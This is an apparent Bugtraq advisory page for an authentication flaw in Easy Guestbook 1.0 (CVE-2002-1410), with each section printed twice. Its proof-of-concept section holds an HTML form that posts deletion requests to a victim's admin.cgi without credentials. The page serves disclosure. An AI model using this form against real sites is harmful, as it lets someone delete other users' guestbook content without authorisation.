Ben Chivers Easy Guestbook Administrative Access Vulnerability
BID:5341
Info
Ben Chivers Easy Guestbook Administrative Access Vulnerability
| Bugtraq ID: | 5341 |
| Class: | Design Error |
| CVE: |
CVE-2002-1410 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 29 2002 12:00AM |
| Updated: | Jul 11 2009 02:56PM |
| Credit: | Vulnerability credited to Arek Suroboyo <[email protected]>. |
| Vulnerable: |
Ben Chivers Guestbook 1.0 |
| Not Vulnerable: | |
Discussion
Ben Chivers Easy Guestbook Administrative Access Vulnerability
The vulnerability has been reported for Easy Guestbook 1.0. It is possible for an atttacker to modify any user's guestbook by deleting entries. The vulnerability is the result of Guestbook failing to properly authenticate users who wish to edit guestbooks.
The vulnerability has been reported for Easy Guestbook 1.0. It is possible for an atttacker to modify any user's guestbook by deleting entries. The vulnerability is the result of Guestbook failing to properly authenticate users who wish to edit guestbooks.
Exploit / POC
Ben Chivers Easy Guestbook Administrative Access Vulnerability
The following proof of concept was provided by Arek Suroboyo <[email protected]>:
<html>
<body>
<h1>Easy Guestbook v1.0 Vulnerabilities</h1>
<form method="POST" action="http://victim/guestbook/admin.cgi">
Delete No. of Entries in Guestbook: <input type="text" value="" name="function" size="5"> <input type="submit" value="Delete Message" name="delete_message" style="font-size: 10pt; font-family: verdana; font-weight: bold"><br><hr>
Open Administration Guestbook: <input type="submit" value="Back to Admin" name="back_to_admin" style="color: #800080; fo
nt-weight: bold">
</form>
</body>
</html>
The following proof of concept was provided by Arek Suroboyo <[email protected]>:
<html>
<body>
<h1>Easy Guestbook v1.0 Vulnerabilities</h1>
<form method="POST" action="http://victim/guestbook/admin.cgi">
Delete No. of Entries in Guestbook: <input type="text" value="" name="function" size="5"> <input type="submit" value="Delete Message" name="delete_message" style="font-size: 10pt; font-family: verdana; font-weight: bold"><br><hr>
Open Administration Guestbook: <input type="submit" value="Back to Admin" name="back_to_admin" style="color: #800080; fo
nt-weight: bold">
</form>
</body>
</html>
Solution / Fix
Ben Chivers Easy Guestbook Administrative Access Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Ben Chivers Easy Guestbook Administrative Access Vulnerability
References:
References:
- Easyscripts Home Page (Ben Chivers)